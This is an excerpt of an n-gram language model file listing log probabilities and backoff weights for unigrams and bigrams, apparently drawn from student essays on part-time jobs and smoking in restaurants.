-0.6378578 clerk , -0.048957378
-0.6378578 Third , -0.048957378
-0.88881266 excel , -0.048957378
-0.88881266 ourselves , -0.048957378
-1.0200102 clothes , -0.048957378
-1.1042644 groups , -0.048957378
-0.88881266 etiquette , -0.048957378
-0.88881266 teacher , -0.048957378
-0.6378578 tourism , -0.048957378
-1.1042644 weekends , -0.048957378
-0.6378578 challenging , -0.048957378
-0.6378578 oppressive , -0.048957378
-0.88881266 exists , -0.048957378
-1.0200102 thought , -0.048957378
-0.6378578 apply , -0.048957378
-1.2088966 habits , -0.048957378
-0.6378578 television , -0.048957378
-0.6378578 front , -0.048957378
-0.88881266 hobbies , -0.048957378
-0.6378578 interview , -0.048957378
-0.6378578 Well , -0.048957378
-0.88881266 handling , -0.048957378
-0.6378578 accounts , -0.048957378
-0.6378578 note , -0.048957378
-0.6378578 Interestingly , -0.048957378
-0.6378578 demanding , -0.048957378
-0.6378578 trips , -0.048957378
-0.6378578 dollars , -0.048957378
-0.88881266 consequently , -0.048957378
-0.6378578 accommodation , -0.048957378
-0.88881266 third , -0.048957378
-0.6378578 diligence , -0.048957378
-0.5477129 said , -0.048957378
-0.6378578 dimension , -0.048957378
-0.6378578 membership , -0.048957378
-1.1639768 mind , -0.048957378
-0.6378578 Personally , -0.048957378
-0.6378578 starving , -0.048957378
-0.88881266 exams , -0.048957378
-0.6378578 clicks , -0.048957378
-0.6378578 Consequently , -0.048957378
-0.6378578 networking , -0.048957378
-0.6378578 crisis , -0.048957378
-0.88881266 Currently , -0.187397
-1.0200102 obvious , -0.048957378
-0.6378578 casino , -0.048957378
-0.6378578 Recently , -0.048957378
-0.6378578 skilled , -0.048957378
-0.6378578 luck , -0.048957378
-0.88881266 dropped , -0.048957378
-1.186661 restaurants , -0.048957378
-0.6378578 demons , -0.048957378
-0.6378578 soul , -0.048957378
-0.6378578 drudgery , -0.048957378
-0.6378578 Again , -0.048957378
-0.6378578 carrels , -0.048957378
-0.6378578 examinations , -0.048957378
-0.6378578 speaking , -0.048957378
-0.88881266 depth , -0.048957378
-0.88881266 five , -0.048957378
-0.88881266 distracted , -0.048957378
-0.88881266 expression , -0.048957378
-0.6378578 18 , -0.048957378
-0.6378578 liked , -0.048957378
-1.0200102 nonetheless , -0.048957378
-1.1042644 approach , -0.048957378
-0.6378578 body , -0.048957378
-0.6378578 over-exertion , -0.048957378
-0.6378578 outlook , -0.048957378
-0.6378578 depression , -0.048957378
-0.6378578 honest , -0.048957378
-0.6378578 Indeed , -0.048957378
-0.6378578 cars , -0.048957378
-0.6378578 cigarettes , -0.048957378
-0.6378578 bartender , -0.048957378
-0.6378578 nations , -0.048957378
-1.5413005 smoking , -0.048957378
-0.6378578 extremes , -0.048957378
-1.0239186 smoke , -0.099168696
-0.88881266 regardless , -0.048957378
-0.88881266 separate , -0.048957378
-1.0200102 patrons , -0.048957378
-0.6378578 standards , -0.048957378
-0.6378578 cancer , -0.048957378
-1.0200102 choices , -0.048957378
-1.1810448 smokers , -0.048957378
-0.88881266 poison , -0.048957378
-0.6378578 addicted , -0.048957378
-0.6378578 Principally , -0.048957378
-0.6378578 importantly , -0.048957378
-0.6378578 long-term , -0.048957378
-0.6378578 firstly , -0.048957378
-0.6378578 diners , -0.048957378
-0.6378578 gradually , -0.048957378
-2.0966144 can often -0.048957378
-2.6721168 be often -0.048957378
-2.1969292 is often -0.04895735
-3.1325557 , often -0.048957378
-2.8984869 and often -0.048957378
-2.6204116 as often -0.048957378
-2.0560963 students often -0.04895735
-2.421799 jobs often -0.048957378
-2.0546458 then often -0.048957378
-2.71969 they often -0.048957378
-2.6925163 are often -0.048957378
-2.3087277 fs often -0.048957378
-0.99086237 reality often -0.048957378
-1.1646541 Too often -0.048957378
-0.6921442 Quite often -0.048957378
-0.6921442 More often -0.048957378
-0.6921442 backgrounds often -0.048957378
-1.4375031 can not -0.14912641
-2.4309325 job not -0.048957378
-1.5519754 is not -0.066231176
-1.5833449 will not -0.048957378
-2.1166947 , not -0.09038658
-1.9314291 often not -0.048957378
-2.2255504 by not -0.048957378
-1.9852308 and not -0.048957378
-2.4516437 of not -0.048957378
-2.7371233 to not -0.048957378
-2.1797895 study not -0.048957378
-2.3380847 from not -0.048957378
-2.6236172 students not -0.048957378
-2.086172 studies not -0.048957378
-2.194169 also not -0.048957378
-2.4959867 time not -0.048957378
-2.1722586 if not -0.048957378
-0.94622356 may not -0.20946135
-2.028133 but not -0.048957378
-1.1519579 otherwise not -0.048957378
-1.1939634 should not -0.18840455
-2.1040967 have not -0.048957378
-1.4335887 's not -0.048957378
-0.94248426 does not -0.048957378
-1.4425223 or not -0.048957378
-1.1904882 are not -0.04895735
-1.5498656 By not -0.048957378
-2.2282803 important not -0.048957378
-1.4342052 productive not -0.048957378
-2.2464046 people not -0.048957378
-0.7087166 do not -0.131905
-2.0455916 could not -0.048957378
-1.9505697 must not -0.048957378
-1.9630787 If not -0.048957378
-1.4370916 might not -0.048957378
-2.176277 would not -0.048957378
-1.1328431 were not -0.048957378
-2.0875368 learn not -0.048957378
-1.5470588 best not -0.048957378
-0.6749218 did not -0.04895735
-1.7802289 was not -0.048957378
-1.5950613 why not -0.048957378
-1.4950674 simply not -0.048957378
-0.6878254 maybe not -0.048957378
-1.8014147 had not -0.048957378
-1.3641227 growth not -0.048957378
-0.6878254 patterns not -0.048957378
-1.1549723 probably not -0.048957378
-2.4409037 this case -0.048957378
-2.5476494 the case -0.11268411
-3.3813157 to case -0.048957378
-2.5811288 from case -0.048957378
-1.4472958 <s> In -0.21447381
-3.4931862 , In -0.048957378
-2.5550597 with many -0.048957378
-1.9161221 for many -0.11268411
-2.3614888 that many -0.048957378
-2.2502701 , many -0.048957378
-1.9707955 In many -0.099168696
-2.4624104 in many -0.048957378
-2.8808706 of many -0.048957378
-1.7355789 For many -0.13618872
-2.773208 students many -0.048957378
-2.580194 on many -0.048957378
-1.4531673 leave many -0.048957378
-2.6028354 have many -0.048957378
-1.1677701 so many -0.048957378
-2.2407582 are many -0.048957378
-2.3476179 them many -0.048957378
-2.271976 fs many -0.048957378
-1.1617546 Too many -0.048957378
-0.80113256 too many -0.048957378
-1.287082 learn many -0.13618872
-1.6213087 since many -0.048957378
-1.6198496 But many -0.048957378
-1.1617546 Australia many -0.048957378
-0.988917 mention many -0.048957378
-0.69116527 share many -0.048957378
-3.2177634 the cases -0.048957378
-2.3482852 many cases -0.048957378
-1.6928706 some cases -0.09038658
-2.1352663 most cases -0.04895735
-1.1688302 certain cases -0.048957378
-1.1688302 extreme cases -0.048957378
-0.69354665 innumerous cases -0.048957378
-2.1123781 for any -0.04895735
-2.8053942 that any -0.048957378
-2.803459 , any -0.048957378
-2.3369257 by any -0.048957378
-2.890147 in any -0.048957378
-2.6012638 of any -0.048957378
-1.7801085 gain any -0.048957378
-1.9860204 from any -0.048957378
-2.6069639 as any -0.048957378
-2.5371995 or any -0.048957378
-1.5228355 consider any -0.048957378
-2.311358 do any -0.048957378
-1.580486 entering any -0.048957378
-1.7456791 enjoy any -0.048957378
-1.27556 without any -0.048957378
-1.9860116 about any -0.048957378
-1.7187887 against any -0.048957378
-0.9903057 under any -0.048957378
-0.6918643 utilize any -0.048957378
-2.8775895 for employment -0.048957378
-1.3830788 part-time employment -0.048957378
-1.6757944 full-time employment -0.048957378
-2.9531138 and employment -0.048957378
-2.6332078 of employment -0.048957378
-3.1322563 to employment -0.048957378
-2.2094445 time employment -0.048957378
-1.384001 Part-time employment -0.048957378
-1.442479 future employment -0.187397
-1.4613192 productive employment -0.048957378
-0.6925645 subsequent employment -0.048957378
-1.8460811 find employment -0.048957378
-0.6925645 gainful employment -0.048957378
-1.2889621 current employment -0.048957378
-2.011255 employment obtained -0.048957378
-2.8837602 are obtained -0.048957378
-0.9947796 qualification obtained -0.048957378
-2.5938754 that by -0.048957378
-2.4361453 job by -0.048957378
-2.597299 is by -0.048957378
-1.6528413 upon by -0.048957378
-2.1182897 , by -0.04895735
-0.58142364 obtained by -0.048957378
-2.5596447 and by -0.048957378
-2.6710854 of by -0.048957378
-2.1829934 study by -0.048957378
-0.687964 created by -0.048957378
-2.5009265 time by -0.048957378
-2.1560862 school by -0.048957378
-1.9701416 then by -0.048957378
-1.7141682 tuition by -0.048957378
-2.0980384 college by -0.048957378
-2.3543775 money by -0.048957378
-2.0309987 you by -0.048957378
-2.0226445 most by -0.048957378
-2.3457656 or by -0.048957378
-2.0970786 help by -0.048957378
-2.2616282 them by -0.048957378
-2.1310108 get by -0.048957378
-1.891795 believe by -0.048957378
-2.014899 up by -0.048957378
-0.687964 determined by -0.048957378
-0.9825856 supported by -0.048957378
-1.434979 entirely by -0.048957378
-1.4959576 quit by -0.048957378
-0.9825856 conclude by -0.048957378
-1.2710757 higher by -0.048957378
-1.5934066 But by -0.048957378
-1.5480624 made by -0.048957378
-0.687964 abide by -0.048957378
-1.4959576 simply by -0.048957378
-1.434979 live by -0.048957378
-0.687964 executed by -0.048957378
-1.3676088 required by -0.048957378
-0.687964 funded by -0.048957378
-0.687964 financed by -0.048957378
-0.687964 subsidized by -0.048957378
-0.687964 thin by -0.048957378
-0.9825856 solely by -0.048957378
-0.687964 supplemented by -0.048957378
-1.273987 ideas by -0.048957378
-0.9825856 offered by -0.187397
-0.687964 respond by -0.048957378
-0.687964 dashed by -0.048957378
-1.8390278 this in -0.048957378
-1.9280022 be in -0.048957378
-2.1159875 part-time in -0.048957378
-1.3386711 job in -0.18543062
-2.0691535 is in -0.048957378
-1.6888387 valuable in -0.048957378
-1.7480721 student in -0.048957378
-1.836322 , in -0.07613316
-1.3325815 employment in -0.048957378
-1.1060647 obtained in -0.048957378
-1.8053398 field in -0.048957378
-1.7480818 and in -0.099168696
-1.8555362 study in -0.048957378
-1.8215882 studying in -0.048957378
-1.1443353 experience in -0.1722646
-1.2458636 working in -0.25144583
-0.9429153 waiter in -0.048957378
-1.4098206 students in -0.14477092
-0.24872011 engage in -0.11268411
-1.6601812 on in -0.04895735
-1.8299239 studies in -0.048957378
-1.8292288 also in -0.048957378
-0.9429153 increased in -0.048957378
-1.3137538 time in -0.0796529
-1.0949244 accomplish in -0.048957378
-1.1937122 jobs in -0.048957378
-1.8517996 one in -0.048957378
-0.9429153 resulting in -0.048957378
-1.8638899 school in -0.048957378
-1.4507525 work in -0.106249355
-0.9429153 found in -0.048957378
-1.8249315 an in -0.048957378
-1.6923311 then in -0.048957378
-1.7509329 but in -0.048957378
-1.7701445 only in -0.048957378
-1.604919 necessary in -0.048957378
-2.1194386 college in -0.048957378
-2.0078247 money in -0.048957378
-1.819564 so in -0.048957378
-1.7332516 or in -0.187397
-1.0498438 well in -0.13618872
-0.9429153 appear in -0.048957378
-0.90872866 positions in -0.048957378
-1.5887195 are in -0.19828911
-1.1970468 ways in -0.048957378
-1.1970468 internships in -0.048957378
-2.0922387 part in -0.048957378
-1.2076097 skill in -0.048957378
-0.6673815 gaps in -0.048957378
-1.635373 ; in -0.048957378
-1.8226506 more in -0.048957378
-1.6648258 better in -0.048957378
-1.3403851 whether in -0.048957378
-1.921623 skills in -0.048957378
-1.9359927 important in -0.048957378
-1.0949244 gained in -0.048957378
-0.96023 learned in -0.048957378
-1.4425187 position in -0.048957378
-1.4045392 issue in -0.048957378
-1.7576237 spend in -0.048957378
-1.7538188 need in -0.048957378
-1.5965135 like in -0.048957378
-1.4171894 put in -0.048957378
-1.4317251 people in -0.04895735
-0.84837097 especially in -0.048957378
-1.4985011 help in -0.048957378
-0.79488015 while in -0.44443417
-1.3308138 major in -0.048957378
-1.6305208 high in -0.048957378
-1.2493957 classes in -0.048957378
-1.4284225 them in -0.048957378
-1.4672174 useful in -0.048957378
-1.718542 society in -0.048957378
-0.9429153 function in -0.048957378
-1.4259391 done in -0.048957378
-0.6857656 fit in -0.048957378
-1.2722793 itself in -0.048957378
-1.5314714 get in -0.048957378
-1.6934384 activities in -0.048957378
-0.6673815 behave in -0.048957378
-1.7533286 up in -0.048957378
-1.1970468 sleeping in -0.048957378
-1.5033946 still in -0.048957378
-0.5677302 helpful in -0.04895735
-0.6673815 exercise in -0.048957378
-0.90872866 graduates in -0.048957378
-0.6673815 difficulty in -0.048957378
-1.8231336 which in -0.048957378
-1.4171894 been in -0.048957378
-0.77588034 period in -0.048957378
-0.9429153 necessity in -0.048957378
-1.4425187 year in -0.048957378
-0.9429153 stake in -0.048957378
-1.4949515 success in -0.048957378
-0.6857656 training in -0.048957378
-1.0949244 '' in -0.048957378
-1.4259391 place in -0.048957378
-1.3965319 importance in -0.048957378
-1.6695335 about in -0.048957378
-1.1970468 factors in -0.048957378
-0.9429153 effectiveness in -0.048957378
-0.6673815 falls in -0.048957378
-1.0949244 keep in -0.048957378
-1.4171894 someone in -0.048957378
-1.5202979 start in -0.048957378
-1.4926577 learn in -0.187397
-1.0949244 successful in -0.048957378
-1.378051 So in -0.048957378
-1.3340962 than in -0.048957378
-1.6601965 years in -0.048957378
-1.2076097 performance in -0.048957378
-1.2823219 now in -0.048957378
-0.5677302 participation in -0.048957378
-1.5251193 always in -0.048957378
-1.3965319 change in -0.048957378
-0.9429153 quickly in -0.048957378
-1.3871932 Working in -0.048957378
-1.0949244 fall in -0.048957378
-0.6673815 somewhere in -0.048957378
-0.9429153 worlds in -0.048957378
-1.7111423 things in -0.048957378
-1.1970468 harder in -0.048957378
-1.4834173 freedom in -0.048957378
-1.4255186 purpose in -0.048957378
-0.9429153 dishes in -0.048957378
-0.6673815 pales in -0.048957378
-1.597286 hours in -0.048957378
-1.604919 day in -0.048957378
-1.0949244 mentioned in -0.048957378
-1.0825288 person in -0.048957378
-0.77588034 early in -0.048957378
-1.4586624 independence in -0.048957378
-1.2823219 clubs in -0.048957378
-1.2722793 University in -0.048957378
-0.9429153 knew in -0.048957378
-0.9632652 point in -0.048957378
-1.4171894 both in -0.048957378
-1.0949244 stay in -0.048957378
-1.0949244 common in -0.048957378
-1.5325872 individual in -0.048957378
-0.46394342 interest in -0.04895735
-1.1060647 confidence in -0.048957378
-1.0949244 hierarchies in -0.048957378
-0.9429153 reports in -0.048957378
-1.2823219 essential in -0.048957378
-0.5138011 later in -0.11268411
-1.378051 actually in -0.048957378
-0.39865378 engaging in -0.048957378
-1.0949244 distraction in -0.048957378
-1.3308138 live in -0.048957378
-0.9429153 element in -0.048957378
-1.1970468 stage in -0.048957378
-1.0949244 country in -0.048957378
-0.6673815 proactive in -0.048957378
-1.2722793 policy in -0.048957378
-0.6673815 mistakes in -0.048957378
-0.9429153 thinking in -0.048957378
-0.9429153 costly in -0.048957378
-1.0079782 spent in -0.048957378
-1.0949244 currently in -0.048957378
-0.6673815 explain in -0.048957378
-0.9429153 survive in -0.048957378
-1.1970468 Being in -0.048957378
-0.24872011 interested in -0.04895735
-0.9429153 changes in -0.048957378
-1.3871932 banned in -0.40449065
-0.6673815 exist in -0.048957378
-0.6673815 involvement in -0.048957378
-0.9429153 excel in -0.048957378
-1.0949244 taught in -0.048957378
-0.6673815 indulging in -0.048957378
-0.6673815 release in -0.048957378
-1.2076097 efforts in -0.048957378
-0.6673815 professions in -0.048957378
-1.0949244 behind in -0.048957378
-0.6673815 participate in -0.048957378
-1.0949244 heavily in -0.048957378
-0.9429153 Currently in -0.048957378
-0.9429153 establishments in -0.048957378
-0.6673815 tables in -0.048957378
-0.9429153 Poker in -0.048957378
-0.6673815 majoring in -0.048957378
-1.6622534 restaurants in -0.048957378
-1.3806164 ban in -0.048957378
-0.6673815 dancing in -0.048957378
-0.6673815 awake in -0.048957378
-0.6673815 excellence in -0.048957378
-0.6673815 concepts in -0.048957378
-0.6673815 himself in -0.048957378
-0.6673815 marks in -0.048957378
-0.6673815 advances in -0.048957378
-0.6673815 weekend in -0.048957378
-0.6673815 progress in -0.048957378
-1.4326838 smoking in -0.3464987
-0.9429153 interference in -0.048957378
-1.2076097 non-smokers in -0.048957378
-1.2823219 smokers in -0.187397
-1.0949244 tobacco in -0.048957378
-0.6673815 sections in -0.048957378
-2.8356202 that field -0.048957378
-2.9859018 a field -0.048957378
-2.7172563 the field -0.048957378
-1.1660838 unrelated field -0.048957378
-2.3840353 their field -0.3855526
-1.5254972 chosen field -0.048957378
-1.7279062 related field -0.048957378
-1.5803852 f field -0.048957378
-2.1163504 -RRB- field -0.048957378
-2.0103927 's field -0.048957378
-1.8980317 career field -0.048957378
-0.9911411 specialized field -0.048957378
-0.6922843 respective field -0.048957378
-1.3826258 his\/her field -0.048957378
-1.1650699 appropriate field -0.048957378
-1.2878569 current field -0.048957378
-2.2633333 <s> and -0.048957378
-1.9816782 for and -0.048957378
-1.8946977 it and -0.048957378
-1.4759145 job and -0.048957378
-1.6009728 valuable and -0.048957378
-1.5061843 student and -0.04895735
-1.5086948 graduation and -0.048957378
-1.0671117 , and -0.08810763
-1.6433684 employment and -0.048957378
-1.9973216 to and -0.187397
-1.3100222 study and -0.04895735
-1.2000314 studying and -0.048957378
-1.3919255 experience and -0.048957378
-1.6717017 working and -0.04895735
-0.9238834 waiter and -0.048957378
-1.4989871 restaurant and -0.048957378
-1.7470617 there and -0.048957378
-1.5809023 students and -0.04895735
-1.2977633 stress and -0.048957378
-1.9333345 on and -0.048957378
-1.2027888 studies and -0.048957378
-1.182269 less and -0.187397
-1.4344673 time and -0.04895735
-1.7991823 jobs and -0.048957378
-1.2454212 tired and -0.048957378
-1.5387714 focus and -0.048957378
-1.1771188 quality and -0.048957378
-1.2763004 school and -0.048957378
-1.116363 work and -0.07333779
-1.327107 -LRB- and -0.048957378
-1.4092859 -RRB- and -0.048957378
-1.5819968 financial and -0.048957378
-1.0991837 tuition and -0.048957378
-0.5984839 fees and -0.04895735
-1.6507337 college and -0.04895735
-0.99482673 money and -0.1038763
-1.6569393 you and -0.048957378
-1.3735396 today and -0.048957378
-1.068158 market and -0.048957378
-0.9238834 competitive and -0.048957378
-1.4020516 degree and -0.048957378
-1.0318192 well and -0.04895735
-1.3735396 benefits and -0.048957378
-1.6287966 future and -0.048957378
-1.3394336 consider and -0.048957378
-1.5451434 academic and -0.048957378
-0.9432952 ; and -0.13618872
-1.1841874 skills and -0.048957378
-0.6571864 spirit and -0.048957378
-1.361187 management and -0.048957378
-1.5967124 through and -0.048957378
-0.5608675 personality and -0.048957378
-1.2480395 themselves and -0.048957378
-0.6571864 expand and -0.048957378
-1.6011622 first and -0.048957378
-1.6113329 enough and -0.048957378
-1.671942 spend and -0.048957378
-1.482256 food and -0.048957378
-1.5931656 good and -0.048957378
-1.4232762 others and -0.048957378
-1.1174805 parents and -0.048957378
-0.6300471 friends and -0.11268411
-1.068158 again and -0.048957378
-1.5754372 people and -0.048957378
-1.4125342 College and -0.048957378
-1.8186079 when and -0.048957378
-0.9238834 teaching and -0.048957378
-0.9238834 theories and -0.048957378
-1.2186906 classes and -0.048957378
-1.4125342 useful and -0.048957378
-1.6411341 society and -0.048957378
-1.2326137 itself and -0.048957378
-0.7640433 grades and -0.048957378
-1.6089702 activities and -0.048957378
-1.3758036 social and -0.048957378
-0.6571864 unwilling and -0.048957378
-1.6772834 fs and -0.048957378
-1.0950483 life and -0.048957378
-0.9238834 realities and -0.048957378
-1.3732433 up and -0.048957378
-1.2326137 immediate and -0.048957378
-1.4564956 personal and -0.048957378
-1.4125342 finances and -0.048957378
-0.9238834 levels and -0.048957378
-1.2454212 debt and -0.048957378
-1.1395026 income and -0.048957378
-1.068158 aware and -0.048957378
-1.1634529 pressures and -0.048957378
-1.6433934 living and -0.048957378
-1.3627629 expenses and -0.048957378
-1.5315179 family and -0.048957378
-0.89640516 independent and -0.048957378
-1.2857128 factor and -0.048957378
-1.3735396 graduate and -0.048957378
-0.98421866 professional and -0.048957378
-1.2454212 ability and -0.048957378
-1.1499598 customers and -0.048957378
-1.4744734 enjoy and -0.048957378
-0.9238834 flexible and -0.048957378
-1.3941008 year and -0.048957378
-0.85212386 education and -0.04895735
-1.379723 world and -0.048957378
-1.4056946 value and -0.048957378
-1.3481085 learning and -0.048957378
-0.6571864 talents and -0.048957378
-1.2326137 interests and -0.048957378
-1.5701921 full and -0.048957378
-1.1634529 factors and -0.048957378
-1.068158 energy and -0.048957378
-1.1634529 assignments and -0.048957378
-0.6571864 rises and -0.048957378
-0.9238834 ethic and -0.048957378
-0.6571864 saving and -0.048957378
-1.361187 beneficial and -0.048957378
-1.5842285 years and -0.048957378
-1.068158 medicine and -0.048957378
-0.6571864 circles and -0.048957378
-1.3735396 meet and -0.048957378
-0.59639573 books and -0.04895735
-0.6571864 huge and -0.048957378
-1.512532 go and -0.048957378
-1.2454212 now and -0.048957378
-0.99968916 needs and -0.048957378
-1.5542489 understand and -0.048957378
-1.1634529 higher and -0.048957378
-0.6571864 momentum and -0.048957378
-1.2411933 hard and -0.048957378
-1.2454212 concentrate and -0.048957378
-0.9238834 active and -0.048957378
-1.1634529 government and -0.048957378
-0.9238834 sophisticated and -0.048957378
-1.1771188 insight and -0.048957378
-0.8922683 universities and -0.187397
-0.9238834 productivity and -0.048957378
-0.6571864 manner and -0.048957378
-0.6571864 issues and -0.048957378
-1.391816 families and -0.048957378
-1.3735396 between and -0.048957378
-1.6325222 things and -0.048957378
-1.2326137 basic and -0.048957378
-1.2857128 tasks and -0.048957378
-0.9238834 suffering and -0.048957378
-1.1771188 America and -0.048957378
-1.2326137 rent and -0.048957378
-1.068158 service and -0.048957378
-1.3394336 anything and -0.048957378
-1.2454212 law and -0.048957378
-0.6571864 unchallenging and -0.048957378
-0.9238834 circle and -0.048957378
-1.536119 hours and -0.048957378
-1.4975594 days and -0.048957378
-1.4262906 week and -0.048957378
-1.5387714 day and -0.048957378
-0.39710817 home and -0.04895735
-1.1543021 responsibility and -0.048957378
-1.068158 lunch and -0.048957378
-1.4020516 independence and -0.048957378
-0.9238834 party and -0.048957378
-1.2454212 drinking and -0.048957378
-0.7640433 clubs and -0.048957378
-1.3627629 companies and -0.048957378
-0.9238834 character and -0.048957378
-0.6571864 taxpayers and -0.048957378
-1.3394336 obtain and -0.048957378
-0.8791915 class and -0.04895735
-0.6571864 record and -0.048957378
-0.67636937 mature and -0.048957378
-0.4049986 discipline and -0.048957378
-0.9238834 organized and -0.048957378
-0.5608675 diligent and -0.048957378
-1.2700281 interest and -0.048957378
-0.6571864 dislikes and -0.048957378
-1.068158 planning and -0.048957378
-0.6571864 rigors and -0.048957378
-0.5608675 confidence and -0.048957378
-0.3944226 guidance and -0.048957378
-0.6571864 essays and -0.048957378
-0.6571864 friend and -0.048957378
-1.4848788 opinion and -0.048957378
-0.9238834 concentrated and -0.048957378
-1.068158 distraction and -0.048957378
-0.6571864 childhood and -0.048957378
-0.9238834 influence and -0.048957378
-1.068158 country and -0.048957378
-1.361187 save and -0.048957378
-0.6571864 authority and -0.048957378
-0.9238834 schools and -0.048957378
-0.6571864 exploitation and -0.048957378
-0.6571864 absenteeism and -0.048957378
-0.9238834 classroom and -0.048957378
-1.4165443 balance and -0.048957378
-0.3944226 organizational and -0.187397
-0.6571864 presently and -0.048957378
-0.6571864 interviews and -0.048957378
-0.6571864 professionally and -0.048957378
-0.7640433 together and -0.048957378
-0.9238834 meetings and -0.048957378
-0.9238834 costly and -0.048957378
-1.068158 personally and -0.048957378
-0.6571864 certified and -0.048957378
-0.9238834 faster and -0.048957378
-0.89640516 children and -0.048957378
-1.068158 community and -0.048957378
-0.6571864 maturity and -0.048957378
-0.3944226 wasted and -0.048957378
-0.6571864 lazy and -0.048957378
-0.7640433 growth and -0.048957378
-1.068158 welcome and -0.048957378
-0.6571864 well-paying and -0.048957378
-1.068158 loan and -0.048957378
-0.6571864 fashion and -0.048957378
-0.6571864 technology and -0.048957378
-1.068158 low and -0.048957378
-0.6571864 tuitions and -0.048957378
-0.6571864 summers and -0.048957378
-0.6571864 hiring and -0.048957378
-0.9238834 dedication and -0.048957378
-0.9238834 private and -0.048957378
-0.6571864 housing and -0.048957378
-0.6571864 wings and -0.048957378
-0.6571864 unsure and -0.048957378
-0.9238834 boss and -0.048957378
-0.6571864 quicker and -0.048957378
-0.6571864 games and -0.048957378
-1.068158 thought and -0.048957378
-0.9238834 spoiled and -0.048957378
-0.6571864 courting and -0.048957378
-0.6571864 style and -0.048957378
-0.6571864 adulthood and -0.048957378
-0.6571864 expenditure and -0.048957378
-0.6571864 quietly and -0.048957378
-0.6571864 feet and -0.048957378
-0.6571864 paycheck and -0.048957378
-0.6571864 cautious and -0.048957378
-1.2146475 health and -0.187397
-0.6571864 exercising and -0.048957378
-0.6571864 resumes and -0.048957378
-0.6571864 dormitory and -0.048957378
-0.9238834 dorm and -0.048957378
-0.6571864 awareness and -0.048957378
-0.9238834 dollar and -0.048957378
-0.6571864 drugs and -0.048957378
-0.6571864 couples and -0.048957378
-0.6571864 goods and -0.048957378
-0.9238834 smaller and -0.048957378
-0.6571864 tournament and -0.048957378
-0.6571864 physics and -0.048957378
-1.068158 partying and -0.048957378
-1.2480395 restaurants and -0.048957378
-0.6571864 housework and -0.048957378
-0.6571864 wrong-headed and -0.048957378
-0.6571864 dispensed and -0.048957378
-0.6571864 holy and -0.048957378
-0.6571864 racism and -0.048957378
-0.6571864 compromised and -0.048957378
-0.6571864 detail and -0.048957378
-0.6571864 confident and -0.048957378
-0.9238834 past and -0.048957378
-0.6571864 maximum and -0.048957378
-0.9238834 distracted and -0.048957378
-1.1634529 here and -0.048957378
-0.6571864 compounded and -0.048957378
-0.6571864 beer and -0.048957378
-1.3884833 smoking and -0.187397
-1.6389887 smoke and -0.048957378
-1.1634529 rights and -0.048957378
-1.1634529 places and -0.048957378
-0.9238834 Restaurants and -0.048957378
-0.6571864 asthma and -0.048957378
-0.6571864 appetite and -0.048957378
-0.6571864 warnings and -0.048957378
-0.6571864 UK and -0.048957378
-0.6571864 welfare and -0.048957378
-0.9238834 poison and -0.048957378
-0.6571864 foods and -0.048957378
-0.9238834 comfort and -0.048957378
-0.6571864 pastime and -0.048957378
-2.2946815 <s> of -0.048957378
-1.7340876 be of -0.048957378
-1.6760712 that of -0.048957378
-1.7562398 job of -0.048957378
-1.8932697 is of -0.048957378
-1.8406625 student of -0.048957378
-2.0840256 , of -0.187397
-1.1636829 many of -0.40449065
-1.1567436 cases of -0.048957378
-1.6536934 any of -0.048957378
-0.33458915 field of -0.43435284
-1.8791423 and of -0.048957378
-1.2545881 nature of -0.048957378
-1.1764005 course of -0.048957378
-1.531143 little of -0.048957378
-1.2445154 experience of -0.099168696
-0.1062074 amount of -0.12183642
-1.3082997 stress of -0.048957378
-0.3955036 top of -0.04895735
-1.545943 less of -0.048957378
-1.2724062 one of -0.13618872
-0.67875934 quality of -0.04895735
-1.9544039 work of -0.048957378
-1.7397772 -RRB- of -0.048957378
-1.505305 And of -0.048957378
-0.8792782 some of -0.25144583
-1.7423034 so of -0.048957378
-1.1456685 most of -0.13618872
-1.4158788 degree of -0.048957378
-1.2424442 Most of -0.048957378
-0.53542435 level of -0.048957378
-1.8408818 are of -0.048957378
-1.1718221 ways of -0.048957378
-1.3863845 benefits of -0.048957378
-1.4259127 benefit of -0.048957378
-0.7084557 part of -0.26013914
-1.088652 foundation of -0.048957378
-1.736489 more of -0.048957378
-1.3760816 potential of -0.048957378
-0.6037655 understanding of -0.1722646
-1.3718971 management of -0.048957378
-0.46130836 knowledge of -0.048957378
-1.5188937 environment of -0.048957378
-1.1847353 increase of -0.048957378
-1.6220485 first of -0.048957378
-1.3718971 issue of -0.048957378
-1.4816552 Many of -0.048957378
-1.6301755 enough of -0.048957378
-1.6997266 need of -0.048957378
-1.6151721 good of -0.048957378
-0.3624679 idea of -0.23452654
-1.374329 parents of -0.187397
-1.3302187 chance of -0.048957378
-1.4505702 use of -0.048957378
-1.7006466 could of -0.048957378
-1.0748656 opportunities of -0.048957378
-1.1263425 all of -0.099168696
-1.3703593 because of -0.048957378
-0.3955036 range of -0.048957378
-0.67875934 area of -0.13618872
-1.0748656 subject of -0.048957378
-0.3955036 source of -0.048957378
-1.6291126 activities of -0.048957378
-0.6597778 unworthy of -0.048957378
-1.1718221 demands of -0.187397
-1.1718221 lot of -0.048957378
-1.6023384 life of -0.048957378
-0.9286844 realities of -0.048957378
-1.1255767 responsibilities of -0.048957378
-0.7670478 result of -0.048957378
-0.9286844 responsibly of -0.048957378
-0.9286844 reality of -0.048957378
-0.9286844 levels of -0.048957378
-1.0748656 aware of -0.048957378
-1.3760816 expenses of -0.048957378
-0.6597778 combination of -0.048957378
-1.5488801 family of -0.048957378
-1.2545881 period of -0.048957378
-0.46241942 development of -0.11268411
-0.69239575 way of -0.048957378
-1.3623174 independent of -0.048957378
-0.3955036 majority of -0.11268411
-1.2545881 ability of -0.048957378
-0.24709822 aspects of -0.04895735
-0.6597778 expect of -0.048957378
-0.34167972 sense of -0.048957378
-0.24709822 member of -0.11268411
-1.4060105 year of -0.048957378
-0.3955036 type of -0.04895735
-1.6829226 world of -0.13618872
-1.4505702 success of -0.048957378
-0.67875934 burden of -0.048957378
-0.3955036 concept of -0.13618872
-0.2081763 cost of -0.25529256
-0.90030324 importance of -0.099168696
-0.6208735 out of -0.08422062
-0.65402234 value of -0.5186737
-1.2424442 interests of -0.048957378
-0.9286844 extent of -0.048957378
-1.3302187 impact of -0.048957378
-0.6597778 reduction of -0.048957378
-0.6597778 relevance of -0.048957378
-0.9286844 determination of -0.048957378
-0.6597778 particulars of -0.048957378
-1.0748656 areas of -0.048957378
-1.351188 Some of -0.048957378
-0.95479435 those of -0.04895735
-0.7902148 years of -0.048957378
-0.3677609 taste of -0.11268411
-1.3718971 means of -0.048957378
-0.32393396 outside of -0.04895735
-1.1718221 load of -0.048957378
-1.3571255 much of -0.187397
-1.1847353 performance of -0.048957378
-0.6597778 weeks of -0.048957378
-0.60016286 costs of -0.048957378
